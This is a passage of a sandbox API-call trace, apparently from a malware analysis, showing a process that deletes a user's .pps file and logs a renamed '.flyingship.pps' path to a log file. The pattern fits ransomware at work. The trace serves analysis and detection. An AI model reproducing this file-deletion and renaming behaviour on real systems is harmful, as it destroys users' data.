wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.835] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.835] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0170.835] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.835] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.838] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFilePart=0x0) returned 0x3c [0170.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xb2e98e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0x90ae18 [0170.842] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\im npo61dtlm5sbx.pps")) returned 1 [0170.846] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xb2e98e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0 [0170.847] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0170.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.860] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.860] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0170.860] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.860] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0170.861] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.861] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0170.861] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0170.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0170.861] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0170.861] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0170.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0170.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0170.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0170.862] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xe13, lpOverlapped=0x0) returned 1 [0170.862] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xe13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.862] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0170.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0170.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x923b28 [0170.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\n", cchWideChar=74, lpMultiByteStr=0x923b28, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 74 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0170.863] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x49, lpOverlapped=0x0) returned 1 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0170.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.863] CloseHandle (hObject=0x138) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0170.865] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0170.865] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0170.866] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0170.866] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.867] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0170.867] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0170.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0170.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0170.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0170.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0170.867] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0170.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0170.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 